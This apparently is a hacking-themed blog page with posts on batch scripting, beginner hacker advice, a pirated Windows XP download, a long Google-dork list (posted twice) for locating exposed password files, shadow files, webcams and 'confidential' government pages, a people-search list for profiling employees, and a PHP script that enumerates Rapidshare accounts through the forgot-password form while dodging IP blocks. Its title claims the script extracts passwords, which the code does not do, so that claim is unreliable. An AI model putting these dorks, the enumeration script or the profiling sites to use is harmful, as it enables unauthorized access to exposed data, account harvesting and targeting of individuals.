RSS Subscription

Subscribe via RSS reader:
Subscribe via Email Address:
 

How to Easily Increase Your Website Visitors without stress

Posted By Dougyfancy On 19:18 2 comments
How to Easily Increase Your Website Visitors without stress


Internet is available for every one of us every day with lots of interesting things to make our day a fulfilling one. There are many people that visit the internet on daily basis and most of these people do so because of one or two benefits that they can get in return for their time spent online. Some visit the internet because of getting information about a particular thing while others visit the web for fun purpose but above all the reasons why people visits the net, one thing that associate everyone that came to visit the web on daily basis is end results that each everyone is looking for (the solution to the problems that make them to visit the internet).

With high amount of people visiting the internet everyday, you as a blogger too can have some of this people on your blog as regular visitors if you know how to!


Learning to know how to attract people to your blog on daily basis must be one of the best thing that you should enjoy doing mostly as a blogger.

If you have been finding it very difficult in attracting people to your website, this article will act as a short guide in helping you solve that problem now and then after you can start to receive awesome traffic from the search engines especially those people that queries the search engines every minutes for information(those people's that visit the web on regular basis finding information).

Here below are the three things you need to do if you want to start receiving huge share of the internet traffic on your blog regularly...

1. Write Awesome Contents

If you enjoy writing good and quality contents on your blog, your chance of getting much people that are searching for information online to your website is very easy because you have good contents that you are sharing in which they (people) too are looking for.

Don't write what you know that people are not ready to read; don't write what they don't bother to query search engines for. Write about what people want and you will see that they will come to your blog.

2. Don't Hold-Back from People, share your best information

Holding back what you have from people is a sign that you don't want them to be your friend. People will always respect and trust you if you are not so bad at sharing useful information with them as your readers and even the first-timers to your blog (people that visits your blog for the first time).

3. Expect the Results

The logic is awesome if you can practice it very well. Write well-explained post that consist ideas and tips that people are looking for and present it to them through your blog post and then wait for the results.

The results will surely come if you do what is right and that is why you should make sure that you take much of your time in offering great contents and also avoid holding back information from people because that should be the tool that you will use in attracting them to your blog.

Learn Batch Programming Commands

Posted By Dougyfancy On 08:03 0 comments
This is too good for energetic individuals...
Hey dear readers I am back with the Batch Programming tutorials. In my last post I told you guys about What is Batch Programming And Need For It. All those who havn’t read that post , pleast read it to get a more clear picture of the topic.

In this post we are going to code our first Batch Program. I am also going to tell you the most commonly used Batch Commands and their uses.

The first command you should know is ECHO. All ECHO does is simply print something onto the screen. It’s like “printf” in C or “PRINT” in Basic. Anyway, this is how we use it.

ECHO Hello World!

All right, now save the above line as a .bat file and double click it. This should be the output -

C:\WINDOWS\Desktop\>ECHO Hello World!
Hello World!

Did you notice that it shows the command before executing it. But we’re coders right? We don’t want our code to look so untidy so just add an @ sign before ECHO and execute it. The code looks much better. The @ sign tells DOS to hide from the user whatever commands it is executing.

Now, what if I want to write to a file? This is how I do it -

@ECHO Hello World > hello.txt

Simple huh? Remember, “>” to create or overwrite a file and “>>” to append ( write at the end ) of a file that already exists. Guess why this program wont work as desired to -

@ECHO Hello World > hello.txt
@ECHO Hello World Again > hello.txt

Looking at it, you will see that the program is supposed to write two lines one after another but it wont work because in the first line it will create a file called hello.txt and write the words “Hello World” to it, and in the second line it just over-writes the earlier text. So actually what it is doing is that it creates a file and writes to it and then over-writes what it had earlier written, to change this we just add a “>”. The additional “>” will make DOS append to the file. So here’s the improved form of the program -

@ECHO Hello World > hello.txt
@ECHO Hello World Again >> hello.txt

Save the above code as a .bat file and execute it, it will work without a hitch.

The next thing we should learn is the GOTO statement. GOTO is just the same as it is in BASIC or for that fact any programming language but the only difference is between the labels.

This is a label in C or BASIC – label:

This is a label in batch – :label

In C or BASIC, the “:” comes after the label and in Batch it comes before the label. Bear this in mind as you proceed. Here’s an example of the GOTO statement -

:labelone
@ECHO LoL
GOTO labelone

If you execute this code, you will see that it is an unlimited loop; it will keep printing to the screen till the end of time if you don’t interrupt it Smile The GOTO statement is very useful when it comes to building big Batch programs.

Now, we will learn the IF and EXIST commands. The IF command is usually used for checking if a file exists, like this -

@IF EXIST C:\WINDOWS\EXPLORER.EXE ECHO It exists

Observe that I have not used inverted commas ( ” ) as I would in BASIC or C.

The EXIST command is only found in Batch and not in any other language. The EXIST command can also be used to check if a file does not exist, like this -

@IF NOT EXIST C:\WINDOWS\EXPLORER.EXE ECHO It does not exist

Remember, Batch is not a language like C or BASIC or Pascal, it cannot do mathematical functions. In Batch, all you can do is control DOS. In the above example notice that there is no THEN command as there would be in most languages.
Sick and tired off using the @ sign before each and every command ? Let’s do some research, go to the DOS prompt and type in ECHO /? and press enter. Interesting, in this way, when you hear of a new DOS command you don’t know about, just type in “command /?” and you can get help on it. Now back to ECHO. According to the help we received by typing in ECHO /? you must have concluded if you type in ECHO OFF you no longer need to type an @ sign before every command.
Wait! just add an @ before ECHO OFF so that it does not display the message – ECHO is off.

The next command we are going to learn about is the CLS command. It stands for CLear Screen. If you know BASIC, you will have no problem understanding this command. All it does is clear the screen. Here’s an example -

@ECHO OFF
CLS
ECHO This is DOS

This command needs no further explanation but type in CLS /? to get more help on the command.

The next command we are going to learn is CD. It stands for Current Directory. It displays the current directory in which you are if you just type in “CD” but if you type in”CD C:\Windows\Desktop” it will take you to the Desktop. Here’s an example -

@ECHO OFF
CD C:WindowsDesktop
ECHO Testing.. > test.txt
ECHO Testing…>>test.txt

This will change the directory to the Desktop and create a file there called test.txt and write to it. If we had not used the CD command, this is how the program would have looked.

@ECHO OFF
ECHO Testing.. > C:\Windows\Desktop\test.txt
ECHO Testing…>> C:\Windows\Desktop\test.txt

See the difference? Anyway that’s all for the The Basics of Batch File Programming. Remember, each an every DOS command can be used in Batch..

I Hope you liked it. I am sure you learnt something new.
enjoy
from my dear friend learn hacking.

learn Batch Programming

Posted By Dougyfancy On 07:57 0 comments
Batch file programming is nothing but a batch of DOS ( Disk Operating System ) commands, hence the name Batch programming . If you are into coding and know many languages you might have noticed that Operating System ( OS ) specific languages ( languages that work only on a particular operating system, eg: Visual Basic Scripting works only in Windows ) give you amazing control over the system. This is why Batch is so powerful, it gives you absolute control over DOS. Batch isn’t often used because it is OS specific, but it is fun and easy to learn. A well-conceived batch file is just the thing to automate the job you want to do.

Batch Files are stored with .bat extension.

To create a batch file follow the following steps..

1) Goto-> Notepad

2) Type Whatever you want ( the code you want to enter)

3) Goto-> Save as

4) Change the file type to all files and folder

5) name the file as anything you want with the extension .bat ,For eg…(“learnhacking.bat”)

I know this was not enough. But this was just the introduction part for beginners. I am sure it might have helped atleast someone. In My next post we will discuss various batch commands and code our first BATCH PROGRAM.

5 Most Common Mistakes Done by Beginners in the field of Hacking

Posted By Dougyfancy On 07:48 0 comments
Hey guyz, today we are going to discuss “5 Most Common Mistakes Done by Beginners in the field of Hacking“ or we can say “5 things Every New Beginner Hacker Should Know”.

This post is for everyone out there who actually want to become a true hacker:-

1) Never trust sites that ask you for money in return of Hacking Softwares or who claim to Hack Email Id’s in return of money. All such things are Scam . Nothing Works.

2) There is NO DIRECT SOFTWARE to Hack Facebook , Google , Yahoo or any other big website. All the softwares that claim to do so are scam. They are just meant to take your money and in worse cases, those softwares have trojans or keyloggers in them. As a result your account gets hacked trying to hack others.

3) NEVER EVER use the keyloggers or trojans you find as freeware on internet. Hackers are not fools. They compile keyloggers and trojans almost with any such software and when you install them , you are already hacked before even trying to hack others.

4) You are never going to be a good hacker without the knowledge of programming and scripting languages. When you are going to use only ready made softwares and would depend on them for hacking anything then your functionality would be limited upto the functionality of the software. When you are not going to use your brain , just doing the copy paste thing, then how can you even think of being a good hacker.

5) If you are a good Hacker, you already become a good programmer , a good script writer , a good web developer and an excellent security expert. Well any good Hacker will/should have good knowledge of various aspects and programming languages. to do XSS (Cross Site Scripting ) , PHP INJECTION , SQL INJECTION , PHISHING , FOOTPRINTING etc… you will have to be good at programing and scripting. And when you know the Various loop holes , vulnerabilities and security tips, you already become a Computer Security Expert.

So Never Ever Under estimate the term Hacker. A Hacker Is Not a person who just hacks email id’s or servers but a True Hacker is a Computer Genius who the knowledge of computers more than anyone.

Next time think before asking the question – “How much Will I get in this field?” because, if you have so many skills , you really don’t have to run after money. Success comes and money follows itself.

How to compress 1 Gb data to 10 or 15 mb

Posted By Dougyfancy On 07:44 0 comments
Hey guyz this time dougyxtrawealth has brought something very interesting for you guyz. Many times our hard disk runs out of space and we have to delete some data or the other for no reason. Even I used to face the problem sometime back in history and by doing some research on the topic, I actually found a working and an awesome way to save my hard disk space.

How effective is it?

Well by this method I converted NFS UNDERGROUND 2 which is somewhat around 2 Gb tb 21 Mb. And same is the case with everything important I wanted to save.

How did I do it?

You are just about to know… Read on.

I used a software named KGB Archiver.

About KGB archiver: KGB Archiver , an open source compression tool like 7zip and UHARC with an unbelievably high compression rate .It uses AES-256 encryption (one of the strongest encryption known for man) to encrypt archives . The disappointing thing with KGB Archiver is due to its high compression rate its minimum hardware requirement is high ( recommend processor with 1,5GHz clock and 256MB of RAM ) and compression and decompression process is time consuming.

Its strength: Very high compression power with very accurate results and no loss of data.

Its weeknss: Due to high compression , the time required to compress and decompress the file is high. High system requirement

From where can you download this software.?

Learn Hacking has already done that for you. Just click on the link given to Download KGB archiver for free.

downloadClick Here to Download KGB Archiver for free>

I am sure you loved this post

Just enjoy and keep learning Ethical Hacking.:-)

ENJOY and say thanks.

Download latest windows-xp-complete-pure-2011-x3264-bit

Posted By Dougyfancy On 07:04 0 comments
Windows XP Complete Pure 2011 (x32/64 bit) | 565MB

Languages Supported : English , French and Arabic

XP version of the excellent team modified giant Genius Team
Version based on the basis of Xp Professional Sp3 Genuine OEM and enabled
Release the last updates until 20 December and the serial ROM with the original – do not need to admit it
Not remove anything from the components of version – so it has the stability of fully and safely beyond the borders

Digital Clear Bad sectors SATA version supports full support and suitable for all devices – including mobile and desktop
Release only consume 2 GB of hard and less than 90 MB of Alramat – Enjoy unlimited speeds




download here:
>filesonic

enjoy

Google Hacking Made So Easy

Posted By Dougyfancy On 20:54 2 comments
More on google database hack,

Google Hacking

allintitle:Brains, Corp. camera

allintitle:"index of/admin"
allintitle:"index of/root"
allintitle:restricted filetype:doc site:gov
allintitle:restricted filetype :mail
allintitle:sensitive filetype:doc

allinurl:/bash_history
allinurl:winnt/system32/ (get cmd.exe)

ext:ini eudora.ini
ext:pwd inurl:(service|authors|administrators |users) "# -FrontPage-"

filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:conf slapd.conf
filetype:ctt "msn"
filetype:mdb inurl:"account|users|admin|administrators|passwd|password"
filetype:mdb inurl:users.mdb
filetype:QDF QDF
filetype:pdf "Host Vulnerability Summary Report" "Assessment Report"
filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" )
filetype:xls inurl:"email.xls"
filetype:user eggdrop user

"Index of /admin"
"Index of /" +.htaccess
"Index of /mail"
"Index of /" "Parent Directory" "WS_FTP.ini" filetype:ini
"Index of /" +passwd
"Index of /password"
"Index of /" +password.txt
intext:"BiTBOARD v2.0" "BiTSHiFTERS Bulletin Board"
intext:centreware inurl:status
intext:"MOBOTIX M1"
intext:"MOBOTIX M10"
intext:"Open Menu"
intext:"powered by Web Wiz Journal"
intext:"Tobias Oetiker" "traffic analysis"

intitle:index.of "Apache/1.3.28 Server at"
intitle:index.of "Apache/2.0 Server at"
intitle:index.of "Apache/* Server at"
intitle:index.of "HP Apache-based Web Server/*"
intitle:index.of "IBM _ HTTP _ Server/* * Server at"
intitle:index.of "Microsoft-IIS/4.0 Server at"
intitle:index.of "Microsoft-IIS/5.0 Server at"
intitle:index.of "Microsoft-IIS/6.0 Server at"
intitle:index.of "Microsoft-IIS/* Server at"
intitle:index.of "Netscape/* Server at"
intitle:index.of "Oracle HTTP Server/* Server at"
intitle:index.of "Red Hat Secure/*"

intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"Welcome to IIS 4.0!"
intitle:"Welcome to Windows 2000 Internet Services"
intitle:"Welcome to Windows XP Server Internet Services"
intitle:"Welcome to Your New Home Page!"
intitle:"Test Page for Apache Installation" "It worked!" "this Web site!"
intitle:"Test Page for Apache Installation" "Seeing this instead"
intitle:"Test Page for Apache Installation" "You are free"
intitle:"Test Page for the Apache Http Server on Fedora Core"
intitle:"Test Page for the Apache Web Server on RedHat Linux"
intitle:"Test Page for the SSL/TLS-aware Apache Installation" "Hey, it worked!"

intitle:"index of" .bash_history
intitle:"index of" etc/shadow
intitle:"index.of" finances.xls
intitle:"index of" htpasswd
intitle:"Index Of" inurl:maillog
intitle:"index of" master.passwd
intitle:"index of" members OR accounts
intitle:"index.of" mystuff.xml
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"Index of" pwd.db
intitle:"Index of" .sh_history
intitle:"index of" spwd
intitle:"index.of" trillian.ini
intitle:"index of" user_carts OR user_cart
intitle:"active webcam page"
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intitle:"curriculum vitae" "phone * * *" "address *"
intitle:"Dell Laser Printer" ews
intitle:"EvoCam" inurl:"webcam.html"
intitle:liveapplet inurl:LvAppl
intitle:"Multimon UPS status page"
intitle:"my webcamXP server!" inurl:":8080"
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"Terminal Services Web Connection"
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"VNC Desktop" inurl:5800
intitle:"Web Server Statistics for ****"
inurl:admin filetype:db
inurl:admin inurl:backup intitle:index.of
inurl:"auth_user_file.txt"
inurl:"/axs/ax-admin.pl" -script
inurl:"/cricket/grapher.cgi"
inurl:hp/device/this.LCDispatcher
inurl:iisadmin
inurl:indexFrame.shtml Axis
inurl:"main.php" "phpMyAdmin" "running on"
inurl:passwd filetype:txt
inurl:"printer/main.html" intext:"settings"
inurl:server-info "Apache Server Information"
inurl:"ViewerFrame?Mode="
inurl:"wvdial.conf" intext:"password"
inurl:"wwwroot/*."

site:gov confidential
site:mil confidential
site:mil "top secret"
"Copyright (c) Tektronix, Inc." "printer status"
"Host Vulnerability Summary Report"
"http://*:*@www"
"Network Vulnerability Assessment Report"
"not for distribution"
"Output produced by SysWatch *"
"These statistics were produced by getstats"
"This file was generated by Nessus"
"This report was generated by WebLog"
"This summary was generated by wwwstat"
"Generated by phpSystem"
"Host Vulnerability Summary Report"
"my webcamXP server!"
sample/LvAppl/
"TOSHIBA Network Camera - User Login"
/home/homeJ.html
/ViewerFrame?Mode=Motion
This reveals mySQL database dumps. These database dumps list the structure and content of databases, which can reveal many different types of sensitive information. http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22%23mysql+dump%22+filetype%3Asql&btnG=Search

These log files record info about the SSH client PUTTY. These files contain usernames, site names, IP addresses, ports and various other information about the SSH server connected to. http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Alog+username+putty

These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user. http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Alog+inurl%3A%22password.log%22

This file contains port number, version number and path info to MySQL server. http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22index+of%22+mysql.conf+OR+mysql_config

This search reveals sites which may be using Shockwave (Flash) as a login mechanism for a site. The usernames and passwords for this type of login mechanism are often stored in plaintext inside the source of the .swl file. http://www.google.com/search?hl=en&lr=&q=inurl%3Alogin+filetype%3Aswf+swf

These are oulook express email files which contain emails, with full headers. The information in these emails can be useful for information gathering about a target. http://www.google.com/search?hl=en&lr=&q=filetype%3Aeml+eml+%2Bintext%3A%22Subject%22+%2Bintext%3A%22From%22+%2Bintext%3A%22To%22

This google search reveals users names, pop3 passwords, email addresses, servers connected to and more. The IP addresses of the users can also be revealed in some cases. http://www.google.com/search?num=100&hl=en&lr=&q=filetype%3Areg+reg+%2Bintext%3A%22internet+account+manager




Footprinting Websites and Information Gathering Resources

A hacker or pen tester may also do a Google search or a site search to locate information about employees. Some sites useful to find more information about an organization and its employees include:

www.trula.com - real estate

www.zillow.com - real estate

www.netronline.com - real estate

www.whosarat.com - informants

www.zabaseach.com - name, address, location info

www.zoominfo.com - person & company data

www.vitalrec.com - people info

www.pipl.com - people search

www.skipease.com/blog/ - people search

www.pretrieve.com - people search

www.publicdata.com - people search

www.urapi.com - people search

https://addons.mozilla.org/en-US/firefox/addon/1912 (who is this person)

www.nndb.com – people activity tracker

www.willyancey.com/finding.htm online info

www.courthousedirect.com - property records

www.turboscout.com - multisearch engine tool

www.theultimates.com - phone number lookup

http://skipease.whitepages.com/reverse_address - address lookup

www.thevault.com - company search / profile

www.blogsearchengine.com - search blogs for info or person

www.ccrs.info - China based company search /profile

www.hoovers.com - company search / profile

www.lexisnexis.com - company search / profile

www.topix.net - region specific news articles

www.pacer.uscourts.gov/natsuit.html - Court records

www.oihweb.com - online investigation techniques

www.linkedin.com - business person's network


Footprinting Links

Google Hacking Database
A search that finds password hashes
Nessus Reports from Google
More Passwords from Google
Google Hacks Volume III by Halla
G-Zapper Blocks the Google Cookie to Search Anonymously
SiteDigger 2.0 searches Google’s cache to look for vulnerabilities
BeTheBot - View Pages as the Googlebot Sees Them
An experts-exchange page to demonstrate the Googlebot
HTTP Header Viewer
Masquerading Your Browser
User Agent Switcher :: Firefox Add-ons
Modify Headers :: Firefox Add-ons
User Agent Sniffer for Project 1
GNU Wget - Tool to Mirror Websites
Teleport Pro - Tool to Mirror Websites
Google Earth
Finding Subdomains (Zone Transfers)
Dakota Judge rules that Zone Transfers are Hacking
Internet Archive - Wayback Machine
Wikto - Web Server Assessment Tool - With Google Hacking
VeriSign Whois Search from VeriSign, Inc.
whois.com
ARIN: WHOIS Database Search
Border Gateway Protocol (BGP) and AS Numbers
Internic | Whois - the only one that finds hackthissite.org
Teenager admits eBay domain hijack
NeoTrace
VisualRoute traceroute: connection test, trace IP address, IP trace, IP address locations

< DON`T FORGET TO SAY THANKS>

Google Hacking Made So Easy

Posted By Dougyfancy On 20:49 10 comments
How TO Hack Google Database And Get All Information you want even softwares just mension it. Use these codes:

Google Hacking

allintitle:Brains, Corp. camera

allintitle:"index of/admin"
allintitle:"index of/root"
allintitle:restricted filetype:doc site:gov
allintitle:restricted filetype :mail
allintitle:sensitive filetype:doc

allinurl:/bash_history
allinurl:winnt/system32/ (get cmd.exe)

ext:ini eudora.ini
ext:pwd inurl:(service|authors|administrators |users) "# -FrontPage-"

filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:conf slapd.conf
filetype:ctt "msn"
filetype:mdb inurl:"account|users|admin|administrators|passwd|password"
filetype:mdb inurl:users.mdb
filetype:QDF QDF
filetype:pdf "Host Vulnerability Summary Report" "Assessment Report"
filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" )
filetype:xls inurl:"email.xls"
filetype:user eggdrop user

"Index of /admin"
"Index of /" +.htaccess
"Index of /mail"
"Index of /" "Parent Directory" "WS_FTP.ini" filetype:ini
"Index of /" +passwd
"Index of /password"
"Index of /" +password.txt
intext:"BiTBOARD v2.0" "BiTSHiFTERS Bulletin Board"
intext:centreware inurl:status
intext:"MOBOTIX M1"
intext:"MOBOTIX M10"
intext:"Open Menu"
intext:"powered by Web Wiz Journal"
intext:"Tobias Oetiker" "traffic analysis"

intitle:index.of "Apache/1.3.28 Server at"
intitle:index.of "Apache/2.0 Server at"
intitle:index.of "Apache/* Server at"
intitle:index.of "HP Apache-based Web Server/*"
intitle:index.of "IBM _ HTTP _ Server/* * Server at"
intitle:index.of "Microsoft-IIS/4.0 Server at"
intitle:index.of "Microsoft-IIS/5.0 Server at"
intitle:index.of "Microsoft-IIS/6.0 Server at"
intitle:index.of "Microsoft-IIS/* Server at"
intitle:index.of "Netscape/* Server at"
intitle:index.of "Oracle HTTP Server/* Server at"
intitle:index.of "Red Hat Secure/*"

intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"Welcome to IIS 4.0!"
intitle:"Welcome to Windows 2000 Internet Services"
intitle:"Welcome to Windows XP Server Internet Services"
intitle:"Welcome to Your New Home Page!"
intitle:"Test Page for Apache Installation" "It worked!" "this Web site!"
intitle:"Test Page for Apache Installation" "Seeing this instead"
intitle:"Test Page for Apache Installation" "You are free"
intitle:"Test Page for the Apache Http Server on Fedora Core"
intitle:"Test Page for the Apache Web Server on RedHat Linux"
intitle:"Test Page for the SSL/TLS-aware Apache Installation" "Hey, it worked!"

intitle:"index of" .bash_history
intitle:"index of" etc/shadow
intitle:"index.of" finances.xls
intitle:"index of" htpasswd
intitle:"Index Of" inurl:maillog
intitle:"index of" master.passwd
intitle:"index of" members OR accounts
intitle:"index.of" mystuff.xml
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"Index of" pwd.db
intitle:"Index of" .sh_history
intitle:"index of" spwd
intitle:"index.of" trillian.ini
intitle:"index of" user_carts OR user_cart
intitle:"active webcam page"
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intitle:"curriculum vitae" "phone * * *" "address *"
intitle:"Dell Laser Printer" ews
intitle:"EvoCam" inurl:"webcam.html"
intitle:liveapplet inurl:LvAppl
intitle:"Multimon UPS status page"
intitle:"my webcamXP server!" inurl:":8080"
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"Terminal Services Web Connection"
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"VNC Desktop" inurl:5800
intitle:"Web Server Statistics for ****"
inurl:admin filetype:db
inurl:admin inurl:backup intitle:index.of
inurl:"auth_user_file.txt"
inurl:"/axs/ax-admin.pl" -script
inurl:"/cricket/grapher.cgi"
inurl:hp/device/this.LCDispatcher
inurl:iisadmin
inurl:indexFrame.shtml Axis
inurl:"main.php" "phpMyAdmin" "running on"
inurl:passwd filetype:txt
inurl:"printer/main.html" intext:"settings"
inurl:server-info "Apache Server Information"
inurl:"ViewerFrame?Mode="
inurl:"wvdial.conf" intext:"password"
inurl:"wwwroot/*."

site:gov confidential
site:mil confidential
site:mil "top secret"
"Copyright (c) Tektronix, Inc." "printer status"
"Host Vulnerability Summary Report"
"http://*:*@www"
"Network Vulnerability Assessment Report"
"not for distribution"
"Output produced by SysWatch *"
"These statistics were produced by getstats"
"This file was generated by Nessus"
"This report was generated by WebLog"
"This summary was generated by wwwstat"
"Generated by phpSystem"
"Host Vulnerability Summary Report"
"my webcamXP server!"
sample/LvAppl/
"TOSHIBA Network Camera - User Login"
/home/homeJ.html
/ViewerFrame?Mode=Motion
This reveals mySQL database dumps. These database dumps list the structure and content of databases, which can reveal many different types of sensitive information. http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22%23mysql+dump%22+filetype%3Asql&btnG=Search

These log files record info about the SSH client PUTTY. These files contain usernames, site names, IP addresses, ports and various other information about the SSH server connected to. http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Alog+username+putty

These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user. http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Alog+inurl%3A%22password.log%22

This file contains port number, version number and path info to MySQL server. http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22index+of%22+mysql.conf+OR+mysql_config

This search reveals sites which may be using Shockwave (Flash) as a login mechanism for a site. The usernames and passwords for this type of login mechanism are often stored in plaintext inside the source of the .swl file. http://www.google.com/search?hl=en&lr=&q=inurl%3Alogin+filetype%3Aswf+swf

These are oulook express email files which contain emails, with full headers. The information in these emails can be useful for information gathering about a target. http://www.google.com/search?hl=en&lr=&q=filetype%3Aeml+eml+%2Bintext%3A%22Subject%22+%2Bintext%3A%22From%22+%2Bintext%3A%22To%22

This google search reveals users names, pop3 passwords, email addresses, servers connected to and more. The IP addresses of the users can also be revealed in some cases. http://www.google.com/search?num=100&hl=en&lr=&q=filetype%3Areg+reg+%2Bintext%3A%22internet+account+manager




Footprinting Websites and Information Gathering Resources

A hacker or pen tester may also do a Google search or a site search to locate information about employees. Some sites useful to find more information about an organization and its employees include:

www.trula.com - real estate

www.zillow.com - real estate

www.netronline.com - real estate

www.whosarat.com - informants

www.zabaseach.com - name, address, location info

www.zoominfo.com - person & company data

www.vitalrec.com - people info

www.pipl.com - people search

www.skipease.com/blog/ - people search

www.pretrieve.com - people search

www.publicdata.com - people search

www.urapi.com - people search

https://addons.mozilla.org/en-US/firefox/addon/1912 (who is this person)

www.nndb.com – people activity tracker

www.willyancey.com/finding.htm online info

www.courthousedirect.com - property records

www.turboscout.com - multisearch engine tool

www.theultimates.com - phone number lookup

http://skipease.whitepages.com/reverse_address - address lookup

www.thevault.com - company search / profile

www.blogsearchengine.com - search blogs for info or person

www.ccrs.info - China based company search /profile

www.hoovers.com - company search / profile

www.lexisnexis.com - company search / profile

www.topix.net - region specific news articles

www.pacer.uscourts.gov/natsuit.html - Court records

www.oihweb.com - online investigation techniques

www.linkedin.com - business person's network


Footprinting Links

Google Hacking Database
A search that finds password hashes
Nessus Reports from Google
More Passwords from Google
Google Hacks Volume III by Halla
G-Zapper Blocks the Google Cookie to Search Anonymously
SiteDigger 2.0 searches Google’s cache to look for vulnerabilities
BeTheBot - View Pages as the Googlebot Sees Them
An experts-exchange page to demonstrate the Googlebot
HTTP Header Viewer
Masquerading Your Browser
User Agent Switcher :: Firefox Add-ons
Modify Headers :: Firefox Add-ons
User Agent Sniffer for Project 1
GNU Wget - Tool to Mirror Websites
Teleport Pro - Tool to Mirror Websites
Google Earth
Finding Subdomains (Zone Transfers)
Dakota Judge rules that Zone Transfers are Hacking
Internet Archive - Wayback Machine
Wikto - Web Server Assessment Tool - With Google Hacking
VeriSign Whois Search from VeriSign, Inc.
whois.com
ARIN: WHOIS Database Search
Border Gateway Protocol (BGP) and AS Numbers
Internic | Whois - the only one that finds hackthissite.org
Teenager admits eBay domain hijack
NeoTrace
VisualRoute traceroute: connection test, trace IP address, IP trace, IP address locations

Trick TO Extracting Username And Pass from Rapidshare server

Posted By Dougyfancy On 21:50 0 comments
Extracting Username And Pass from Rapidshare server

session_start();

$browserData = array();
$browserData[CURLOPT_USERAGENT] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9";
$browserData[CURLOPT_FOLLOWLOCATION] = true;
$browserData[CURLOPT_COOKIESESSION] = true;
$browserData[CURLOPT_COOKIEFILE] = "cookie";
$browserData[CURLOPT_COOKIEJAR] = "cookie";

function curlInit($link,&$browserData,$ssh = false)
{
$ch = curl_init($link);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, !$ssh);
curl_setopt_array ($ch,$browserData);

return $ch;
}
function array2postFields($data)
{
$data = (array) $data;

$postData = "";
foreach($data as $name => $value)
$postData .= $name . "=" . $value . "&";
$postData = substr($postData,0,-1);

return $postData;
}

class rapidshare
{
function __construct(&$browserData)
{
$this->browserData = &$browserData;
$this->link = "http://rapidshare.com/cgi-bin/forgotpw.cgi";
}

function requestpassword($username)
{
$ch = curlInit($this->link,$this->browserData,false);

$data = array("email"=>$username);

curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,array2postFields($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$responseText = curl_exec($ch);
curl_close($ch);


return $responseText;


}

function translateResponse($responseText)
{
$responseRegexs = array(
"noaccounts" => "No accounts found. Please try again",
"valid" => "accounts and sent the data to your e-mail address",
"invalid" => "E-Mail address invalid!",
"ipblocked" => "Too many password requests from your IP-Address! Please try again in one hour"
);
foreach($responseRegexs as $name => $value)
if (preg_match('%' . $value . '%', $responseText))
return $name;
return false;
}
function testUser(&$user)
{
$responseText = $this->requestpassword($user["username"]);

$response = $this->translateResponse($responseText);

if($response == "ipblocked" || !$response)
{
echo "IP BLOCKED. Next try in seconds. Leave the window opened for autorefresh, or change your ip";
$waitingTime = 3610;
$clockScript=
<< waitingTime = $waitingTime; function showClock() { clockHolder = document.getElementById("clock"); clockHolder.innerHTML = waitingTime--; } showClock(); window.setInterval(showClock,1000); CLOCK; echo $clockScript; echo ""; return false; } else { $user["response"] = $response; return true; } } } ?>



if(isset($_GET["reset"]))
$_SESSION = array();

$users = &$_SESSION["users"];
$info = &$_SESSION["info"];

if(!isset($users))
{
if(!empty($_POST["users"]))
{
function validUsername(&$username)
{
$username = strtolower($username);
return preg_match('/\A[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,4}\Z/',$username);
}
$users = array();
$lines = explode("\n",$_POST["users"]);
foreach($lines as $line)
{
if (get_magic_quotes_gpc())
$line = stripslashes($line);

$username = trim($line);

if(validUsername($username))
{
$users[] = array(
"username" => $username,
"response" => false
);
}
}

$info["nUsers"] = count($users);
$info["currentUser"] = 0;

if(!$info["nUsers"])
{
$_POST = array();
$_SESSION = array();
}
}

if(empty($_POST["users"]))
{
?>
Give me some list of emails
You can freely refresh the window

email1@server.com
email2@server.com



}
}

if(isset($users))
{
$rapidshare = new rapidshare($browserData);

$exec = $_GET["exec"];

if(isset($exec))
{
for($n = $info["currentUser"]; $n < $info["nUsers"]; $n++) { if ($rapidshare->testUser($users[$n]))
$info["currentUser"]++;
else
{
break;
}
}
}

echo "Tested: " . $info["currentUser"] . " users

";

for($n = 0; $n < $info["currentUser"]; $n++) { $user = $users[$n]; printf("Username: %s - ",$user["username"]); switch($user["response"]) { case "invalid": { echo "doesn't work. invalid"; break; } case "noaccounts": { echo "doesn't work"; break; } case "valid": { echo "[b]just WORKS![/b]"; break; } default: { echo ".unable to test. Contact the author"; } } echo " "; } echo "[url="?exec"]EXEC[/url]"; } ?>
[url="?reset"]RESET[/url]

Super Rapidshare Solution Hack 2008 Edition

Posted By Dougyfancy On 21:43 0 comments
Rapidshare Solution Hack 2008 Edition

Rapidshare And Megaupload Search Plugin Maker
Rapidshare Anti Leech Decrypter 4.0
Rapidmule Rapidshare Downloader
BrutalDown Rapidshare Tips And Hints
Rapidshare/Megaupload Speeder
